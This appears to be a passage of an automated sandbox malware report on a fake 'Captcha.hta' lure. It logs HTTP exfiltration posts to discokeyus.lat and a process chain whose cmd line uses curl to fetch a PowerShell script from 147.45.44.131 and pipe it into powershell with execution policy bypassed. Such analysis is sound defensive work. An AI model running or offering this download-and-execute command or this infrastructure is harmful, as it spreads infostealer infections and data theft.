                                                                                                      2024-12-20 06:18:14 UTC15331OUTData Raw: 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e
                                                                                                      Data Ascii: --HOFL2KSKOEIContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--HOFL2KSKOEIContent-Disposition: form-data; name="pid"3--HOFL2KSKOEIContent-Disposition: form-data; name="lid"DUkgLv--tax--HOFL2KSKOEIConten
                                                                                                      2024-12-20 06:18:14 UTC5062OUTData Raw: 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64
                                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO@d
                                                                                                      2024-12-20 06:18:15 UTC1131INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:15 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=qtd38a6bo20tke4kl412q9u9n1; expires=Tue, 15 Apr 2025 00:04:54 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxkFLfSJjbJQgV9aUoGx%2FTlEE%2Fd1bbT%2Fc775ApWvDjJsBeNNPAn7YUnMbdr9ur3Z1e7tJb8tFmoev7igW0HVXI7QygeTvRH1oBG1lKMYxTUbgsA3FPF3Tyl8DI47LRYTuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f4d83935e5942fc-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=2512&rtt_var=949&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21346&delivery_rate=1149606&cwnd=187&unsent_bytes=0&cid=d3e5c07b78a8b0f2&ts=978&x=0"
                                                                                                      2024-12-20 06:18:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-20 06:18:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.449743172.67.197.1704437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-20 06:18:17 UTC277OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=JC8R6DT9XAQROPUH
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1238
                                                                                                      Host: discokeyus.lat
                                                                                                      2024-12-20 06:18:17 UTC1238OUTData Raw: 2d 2d 4a 43 38 52 36 44 54 39 58 41 51 52 4f 50 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 43 38 52 36 44 54 39 58 41 51 52 4f 50 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 43 38 52 36 44 54 39 58 41 51 52 4f 50 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 4a 43 38 52
                                                                                                      Data Ascii: --JC8R6DT9XAQROPUHContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--JC8R6DT9XAQROPUHContent-Disposition: form-data; name="pid"1--JC8R6DT9XAQROPUHContent-Disposition: form-data; name="lid"DUkgLv--tax--JC8R
                                                                                                      2024-12-20 06:18:17 UTC1130INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:17 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=rqsu4canolah2aln9nnist9tn8; expires=Tue, 15 Apr 2025 00:04:56 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbXaOvbuTNZbf1%2Bw31T9UFahEu0MtNcdr4T%2BaLH3H7Nc8hJk%2BL3BOi7R3NIA5gJbbuwrmcCcraOr2%2F0124LZxp6qPDWtAVlG3SkqkKW9ismkC%2BGa8fy0qut3CLxe9PlIgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f4d83a1cd478c77-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1828&rtt_var=686&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2151&delivery_rate=1593886&cwnd=244&unsent_bytes=0&cid=dae31b787b71f2a4&ts=767&x=0"
                                                                                                      2024-12-20 06:18:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-20 06:18:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.449745172.67.197.1704437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-20 06:18:19 UTC282OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=LXVLWAQ0XJVMO2E3BHW
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 549547
                                                                                                      Host: discokeyus.lat
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 2d 2d 4c 58 56 4c 57 41 51 30 58 4a 56 4d 4f 32 45 33 42 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 58 56 4c 57 41 51 30 58 4a 56 4d 4f 32 45 33 42 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 58 56 4c 57 41 51 30 58 4a 56 4d 4f 32 45 33 42 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61
                                                                                                      Data Ascii: --LXVLWAQ0XJVMO2E3BHWContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--LXVLWAQ0XJVMO2E3BHWContent-Disposition: form-data; name="pid"1--LXVLWAQ0XJVMO2E3BHWContent-Disposition: form-data; name="lid"DUkgLv--ta
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 54 84 37 84 e6 bf 74 1e d7 fe b7 b2 67 04 77 02 27 6b 59 f1 0c 65 98 ee 71 2a 55 2b c5 0f 92 da f8 a9 eb 18 13 27 ba 97 6d fc c0 e4 53 e0 78 38 55 f9 fe 79 04 d4 1b a2 34 14 be 1b 37 0c 78 92 63 62 fd 7f 2e 23 ec ab 00 9a b8 9c 9b 6d f1 97 01 db 27 f9 e8 34 b6 82 98 e9 02 dd d3 58 20 76 45 1d 56 ca 27 24 87 f8 16 9c 75 16 14 08 90 26 ae df 18 3f 11 27 40 9b 2f 56 9f 8a bf 13 6e b7 11 11 70 2c 6c 2f c3 e8 0f 21 5b 67 e7 83 28 e3 20 bc 3e 28 e9 08 f2 9f cc 83 e0 6c a8 52 0a 7f a4 19 2e dc 0f 1c b4 3a 01 b9 9a e7 2d 88 54 df b8 b4 28 70 e3 df 96 8f 03 2e 7d 63 7d ef d2 46 ec 87 9c de a1 43 35 eb 37 ae 52 a1 02 fb 8a 0e 93 92 ab 89 21 ae 93 69 51 28 b8 77 bf 8f 88 11 26 14 99 76 62 68 5a 0e 06 24 f9 c7 53 73 41 71 b0 a3 cb 9a 43 83 06 7e 3a 60 e9 e0 fb 3e 3d
                                                                                                      Data Ascii: T7tgw'kYeq*U+'mSx8Uy47xcb.#m'4X vEV'$u&?'@/Vnp,l/![g( >(lR.:-T(p.}c}FC57R!iQ(w&vbhZ$SsAqC~:`>=
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 9b fc c5 31 fd 28 26 c8 b6 9b 83 09 ab 6c 0d 73 e7 bd 9c d3 2c 85 94 8f 1c c9 17 c3 bc c7 34 4b 87 0c e4 f9 58 c9 49 5d 5a 6a 9d 48 a9 97 e8 c2 d4 6a 29 bc 6d 0d c6 07 0c d7 52 4d b8 df 3f 8e c7 95 8d 4e 4e 4f 47 d7 e9 4f 28 39 ab 80 9d 8e 11 10 41 6e 1f 9e 6a 19 48 54 51 52 8c 88 fb f5 fe c4 31 f9 48 03 a7 2e 43 9c df 71 15 3e 3f 5e be 5a 57 07 f7 a8 b1 ec d7 bb 0c 02 ff 5d 35 eb 69 81 57 25 3c 3c 9a 9f 47 3c 16 cd 2f b4 a6 d4 b7 24 b4 b3 49 4e fb d5 46 ed a3 38 82 1c 4a 68 0f ce e4 a1 ee 92 78 a5 ca 2b c1 d4 96 3b a1 b5 7b f2 27 e5 fa f9 bf ab 67 4d 5e 19 fd 7d 36 fa 6a 7a c8 3e be bb 41 a2 7d d4 66 c3 e7 8d d1 b0 bf f8 2f c5 da a9 10 7e f4 4f 66 f7 ba d3 15 bf 47 99 86 88 ce 2c d1 ac dc 16 59 a1 f5 e1 d8 63 43 50 77 d4 96 c8 d3 1d 05 2a e9 2c e5 09 5e
                                                                                                      Data Ascii: 1(&ls,4KXI]ZjHj)mRM?NNOGO(9AnjHTQR1H.Cq>?^ZW]5iW%<<G</$INF8Jhx+;{'gM^}6jz>A}f/~OfG,YcCPw*,^
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 09 12 27 a6 45 5a 88 0c 77 5c e7 2e aa 00 9d f3 c9 55 dc ad 0d dc 72 df ab 63 b7 37 50 d2 98 66 f4 f2 d6 b3 58 aa 18 bb ec e6 6e 7a 94 f5 a7 67 7b 3f a1 61 46 e5 92 cb 81 8d 17 fd 02 3d 99 15 9f 47 6a 2a 5e fe c3 62 72 f3 63 4f 57 4f ad fc 71 62 52 9b cf 09 75 8d fd dc fa 4d f5 35 76 b7 79 c5 b9 f6 69 7f 26 35 6f 2f 70 14 2e 02 98 5b a7 81 e3 85 1d 3c 3b 75 7a 65 0b 85 59 6e c3 12 ac d2 03 6d 1c 8e 3a 3e dc e6 eb fa a3 7b 11 56 13 72 93 05 d2 40 36 26 e4 96 d7 3c 44 b7 0b b5 37 f8 a0 8e 9f e9 7d 43 6e 33 79 1a 6e a1 05 1c 3e fe da 40 7c 84 29 f0 90 ff ff 8e 40 47 32 47 21 50 86 86 9a 0c c0 b5 b2 5c 44 64 49 44 6a 96 a2 c0 85 90 a7 da 7c 6b 74 71 55 ec ab 57 8a 43 5a 3f 00 61 0f d1 11 f3 0c 4b fc 32 e9 ea c1 0d 2c 7e 62 18 a5 82 02 89 1f 39 21 36 11 36 89
                                                                                                      Data Ascii: 'EZw\.Urc7PfXnzg{?aF=Gj*^brcOWOqbRuM5vyi&5o/p.[<;uzeYnm:>{Vr@6&<D7}Cn3yn>@|)@G2G!P\DdIDj|ktqUWCZ?aK2,~b9!66
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 94 f9 fe 21 12 b3 65 23 88 3d c2 e0 d7 30 29 37 d9 67 b8 6f 20 e7 55 49 d9 e7 fe 69 a2 1c 44 59 0a 93 7a c6 41 ff 2f 2a 5c a6 2f cf 7b 69 db d3 08 f3 7c 19 f9 da 05 30 95 30 27 e4 d5 fc 1e 33 96 91 68 6a 4f fc 37 12 81 a6 86 8a ed 91 c6 ce a3 3c d1 e6 ed 28 73 27 8d 5f 97 f1 2f fd b6 de 83 e8 8e 73 01 ac 3e 04 89 65 04 30 7d d3 e9 36 6b 66 76 e7 c9 d5 13 9c 6b 06 78 fc 94 6e f0 57 c9 40 2c 0f 46 18 d3 ab 30 8e 66 44 15 75 1b cd c9 7e b0 66 34 19 63 c3 85 1a e5 ad dc 33 9d 92 46 47 c6 ef cc 0c 55 c4 6f be 14 a0 f0 73 ee 8c 06 63 eb 49 b5 d7 99 cc 88 bf 07 c9 75 12 91 c6 75 08 76 20 4c a2 1c 75 89 48 eb 43 33 e2 ca d5 d3 e1 7b 7c 4b 4f f9 54 24 93 2d ed 33 12 70 42 82 fb 19 25 7b 76 e9 70 49 df 65 4d 6f 3c 93 88 3c cc 67 52 f5 63 a5 49 eb e6 6a 66 eb 16 77
                                                                                                      Data Ascii: !e#=0)7go UIiDYzA/*\/{i|00'3hjO7<(s'_/s>e0}6kfvkxnW@,F0fDu~f4c3FGUoscIuuv LuHC3{|KOT$-3pB%{vpIeMo<<gRcIjfw
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: d4 3b 09 71 a4 be 17 3c 6c 9d 47 cf 3e 4d 31 33 1c 98 38 1a b3 ab fa ef fb dd 18 52 92 9a a9 1c f7 23 51 37 98 14 47 fa f6 30 ea f9 61 59 51 e0 d8 24 37 14 a9 f3 f5 db 92 65 7a 45 47 53 3c e7 8a b0 f8 8f bf b9 1d ae d8 3b 70 90 3f 74 02 13 ea 8f fa b1 80 8b cd aa 33 a1 99 87 4d 84 48 70 e6 9f 04 56 7a b1 12 54 ae 8d 83 65 df f4 8a c2 ec dd 32 b0 21 06 7e c9 c5 ae 8f 12 1d 6c 7b 75 96 58 5d df 2d 61 7b e1 85 17 4f ff 77 98 e6 7a 06 f6 0e 97 b4 08 fd 15 62 27 aa ca 44 52 61 9b b1 5a 51 96 dd ba 5a ed 33 94 a1 ee 87 79 af 0f ee cf 3e 73 01 7d 73 8d 71 66 67 a6 c8 55 e8 26 55 5d 73 19 3d 8b 5e ce 99 b1 39 4a a6 b3 96 54 69 63 00 bc 45 33 e6 59 7d a4 34 11 40 d8 23 16 a5 c4 cd 6e d8 5e 1b fc 77 5d 72 a4 86 d9 39 f5 33 41 ee b8 33 bc 0f 34 a8 ec ec 77 98 6d 81
                                                                                                      Data Ascii: ;q<lG>M138R#Q7G0aYQ$7ezEGS<;p?t3MHpVzTe2!~l{uX]-a{Owzb'DRaZQZ3y>s}sqfgU&U]s=^9JTicE3Y}4@#n^w]r93A34wm
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 56 af 08 cb 03 17 bc ff 60 c6 14 dc 5c 59 0a b5 e4 51 f2 18 b6 f9 7f d7 8e fd cf 51 ab d3 db e7 bf dd a8 26 a5 2b 2b fe 69 17 71 04 18 36 85 43 d8 51 5c d4 e4 88 8f d6 f3 8f 63 f1 2e 77 02 bf 1d 79 b4 b4 95 e9 65 bc 4f 64 c3 cb 51 40 a1 ba e7 a5 37 a6 68 f8 32 0e 8f f8 fe 3b 1d 3b 56 bc 60 4e e2 ff ba d9 8e a8 03 d2 4e 55 46 37 b3 cd 53 7d 9f 38 b8 f2 4f ea 8e 58 67 1e 44 91 20 4c 28 ed b1 47 8e cd d7 42 60 f6 59 28 44 94 cb 52 86 1c 85 7b 4f 72 b4 ce a5 71 ef f5 a0 63 fa f0 2e 17 89 81 bc f7 23 2d da 36 35 6b 45 b3 3c e4 4a d6 34 33 47 a8 53 34 dc 45 b2 38 a2 fa 08 b0 18 cd d4 40 7d c7 f6 fe a5 0d 57 34 5c c5 41 6a 0d d8 d8 ab 91 e5 90 b5 a3 bd 04 e0 a9 71 82 88 43 21 78 56 b1 73 76 96 c8 24 eb f0 e0 f7 2b 94 ca 5d b7 95 98 23 13 2c 4b b1 2c 6c d8 cf 5f
                                                                                                      Data Ascii: V`\YQQ&++iq6CQ\c.wyeOdQ@7h2;;V`NNUF7S}8OXgD L(GB`Y(DR{Orqc.#-65kE<J43GS4E8@}W4\AjqC!xVsv$+]#,K,l_
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 09 4c e8 6a 08 ba 49 c3 3a ea 6a 5a 5c 39 3b 89 7c b4 b4 b9 a2 b7 f5 c9 56 ed 9b 5f 16 84 94 04 19 2b b6 11 8f 0e 0e e7 2f 1a d8 f4 66 17 77 b4 a3 db fe 18 0a 06 81 47 50 86 c3 de d2 4b c5 72 29 23 2e a7 36 a5 11 9e cb ce 99 c6 4d e8 53 88 d0 48 ac 17 52 9d ba 9a 9d ba eb 0d 06 b8 9c 5f 97 63 c5 3b e3 e5 83 bf fb c2 da f8 e2 a4 6f be 43 f9 d7 a6 32 58 7a 3b f6 b2 88 8c 26 74 93 ac 22 82 a9 d8 6b 90 b0 51 c5 21 dc cb 31 dd df 3f 12 45 51 18 bd b5 4a ae 3c ce d1 ab af e6 a6 fc 03 7a 14 21 0d a3 63 5a 2b d5 cb 1e d6 96 38 31 91 61 f5 29 21 9c db c7 9f 5c 60 55 3a 38 75 24 f7 48 68 f2 91 93 e7 ff 9d 36 63 91 d6 45 77 d8 11 25 df d8 62 db 66 e5 a2 56 7a 4e 43 19 d9 3e 89 3b 2f 2e 4d 1b 8e 7e b2 83 3e f3 3c 81 cf 62 c1 bc 70 5f fa 39 a0 b5 70 80 58 82 40 1c e5
                                                                                                      Data Ascii: LjI:jZ\9;|V_+/fwGPKr)#.6MSHR_c;oC2Xz;&t"kQ!1?EQJ<z!cZ+81a)!\`U:8u$Hh6cEw%bfVzNC>;/.M~><bp_9pX@
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: 5a e6 ec 6b 6d 16 06 8b 6c 84 15 18 78 88 2f c9 ce a6 e9 e0 c8 26 b1 fd ff ff 89 09 67 00 a7 ed e8 07 64 71 e7 50 bb 0c 51 1d fa 91 3f de f9 6e 5d d6 96 9f a8 36 27 68 0a 00 09 ac 54 aa 7b 9e 1a 61 41 4f cf 08 7d f4 6e 83 fe d0 89 01 df f4 27 ad dd 9f 1f e6 9b 09 f2 6e cd db 7f 32 a2 fe ef 96 98 20 08 f1 59 5c 44 03 6d fc 15 1c 78 8b 2e 14 40 0d 93 c9 92 ff 04 a7 69 fb 24 6e 1e ab b1 34 e6 f7 d5 41 30 60 c0 09 72 8e 2c b5 17 45 0f 70 28 54 1a e6 4a 1e ee 97 1a 71 8d c7 8e a8 d2 05 30 da 2c cf 68 6a 30 c0 af 3f 66 8d ad 00 3e 15 f3 c1 e3 22 6f b6 e2 f6 4d 5b a1 79 ed 7c f8 cc 9c a9 9a 13 a7 36 9f 55 a4 1a f3 0a 8e 89 df 83 60 a3 6e fd f5 2b 0e 12 a8 eb 09 13 10 b8 41 c0 35 e0 ea 95 a3 42 76 53 f9 01 84 83 56 88 7b 43 77 72 ed 5a 73 66 c9 2e 36 a6 4e 23 d8
                                                                                                      Data Ascii: Zkmlx/&gdqPQ?n]6'hT{aAO}n'n2 Y\Dmx.@i$n4A0`r,Ep(TJq0,hj0?f>"oM[y|6U`n+A5BvSV{CwrZsf.6N#
                                                                                                      2024-12-20 06:18:19 UTC15331OUTData Raw: c7 9c db e1 e4 46 94 5c 6a 8a b7 88 46 bc 85 c5 33 2d 85 2b c9 22 a4 5d eb 37 8d b4 d7 1c d4 33 f9 22 9d 47 4e 46 d0 5f de 94 9c 30 b5 fc 14 cd bf c1 e7 43 40 d7 5e 47 13 ce f0 5f 93 14 74 9c d7 a7 09 7c b5 ff bf 97 de 58 c7 e9 9d cc 84 f8 98 c4 b2 9d 86 bc cc bb 6a 5e 82 88 37 66 d1 63 8d 89 80 61 77 14 e4 1f 9e 51 81 f2 7f 99 31 dd 1d 86 2f 5e fd 22 5a b9 f3 66 31 5b 03 01 91 5f 5c 53 4f 7b b3 ae e6 87 33 12 f2 97 6a 26 5c a6 e0 89 da 26 52 05 5a 5d c0 b2 75 47 e8 51 18 86 a9 41 31 6a 85 a6 38 6f f7 eb cb 45 2a 29 13 00 76 72 f4 8e f3 37 86 7c 67 07 7a 7a 48 1f 70 9d 3f 30 5a 13 de 73 5b c0 31 68 e1 d5 bc bd 0a b1 85 9e e5 31 58 29 37 58 72 d7 25 5f 6c 61 20 4c 2a d2 bb 59 b9 63 6c a9 58 9b 1e 45 ad 9b f5 c8 0b 41 b8 17 30 f6 e7 fa d8 2b c2 20 c4 7b 6e
                                                                                                      Data Ascii: F\jF3-+"]73"GNF_0C@^G_t|Xj^7fcawQ1/^"Zf1[_\SO{3j&\&RZ]uGQA1j8oE*)vr7|gzzHp?0Zs[1h1X)7Xr%_la L*YclXEA0+ {n
                                                                                                      2024-12-20 06:18:23 UTC1139INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:23 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=d83b3nb2aao6tirbjf2v7182cd; expires=Tue, 15 Apr 2025 00:05:01 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZICPfnb%2FNZd%2FM35YEz4lgzojt6uOFHCupTj2qF0PeBUb0RpaJJ7GR3mxPXC%2BsEbMFaER%2FUB6rp%2BiiItZb2gu4pAApWubS9naJ4wmtGwWlBSoL551EaSL54Xe55z%2F7hPv1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f4d83b08f567271-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2055&min_rtt=2026&rtt_var=781&sent=194&recv=573&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552027&delivery_rate=1441263&cwnd=225&unsent_bytes=0&cid=ca61afb93b22fa03&ts=3765&x=0"


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:01:17:57
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\Captcha.hta"
                                                                                                      Imagebase:0xfc0000
                                                                                                      File size:13'312 bytes
                                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:01:17:57
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
                                                                                                      Imagebase:0x240000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:01:17:57
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:01:17:57
                                                                                                      Start date:20/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\curl.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1
                                                                                                      Imagebase:0xac0000
                                                                                                      File size:470'528 bytes
                                                                                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
